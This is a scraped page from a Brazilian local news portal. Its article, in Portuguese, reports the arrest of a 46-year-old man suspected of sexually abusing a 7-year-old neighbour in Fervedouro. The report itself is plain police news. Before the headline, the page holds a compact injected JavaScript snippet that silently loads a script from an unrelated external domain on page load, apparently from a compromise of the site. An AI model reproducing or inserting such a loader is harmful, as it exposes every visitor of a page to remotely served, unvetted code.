;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Homem é suspeito de abuso contra vizinha de 7 anos em Fervedouro. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Homem é suspeito de abuso contra vizinha de 7 anos em Fervedouro.

Um homem de 46 anos foi detido pela Polícia Militar, no fim da tarde desta terça-feira (21), na cidade de Fervedouro, suspeito de abusar sexualmente de uma menina de 7 anos de idade. O caso veio parar em Muriaé.
De acordo com informações do boletim de ocorrência da PM, a mãe da garota chamou os militares, alegando ter flagrado o acusado acariciando e abraçando sua filha, em um quarto da casa de uma vizinha onde a criança costuma ficar enquanto a mãe trabalha.
Ainda conforme o registro, a mulher contou que chegou mais cedo que de costume e viu pela janela de um dos quartos da residência o homem fazendo carinho na menina e, que por isso, entrou sem chamar, flagrando o suspeito abraçando a garota, no quarto. Ela disse que já em casa, questionou a filha, que teria revelado que além do abraço, o vizinho havia mostrado a ela seu órgão genital e lhe beijado na boca.
Diante dos relatos, o suspeito foi preso em flagrante e segundo a PM, ele fazia promessas de presentes à garota e há cerca de 15 dias deu um celular a ela, no qual foram encontradas várias fotos suas com a menina.
O homem foi apresentado à Polícia Civil, já à noite, aqui em Muriaé, no plantão da Delegacia Regional. Após ser ouvido pelo delegado, ele foi autuado, encaminhado ao Presídio Municipal e vai responder pela acusação de estupro de vulnerável.
abuso
Fonte : Rádio Muriaé

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.